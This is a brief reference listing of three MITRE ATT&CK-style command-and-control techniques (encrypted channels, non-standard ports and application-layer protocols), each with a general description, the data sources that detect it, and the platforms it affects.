Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre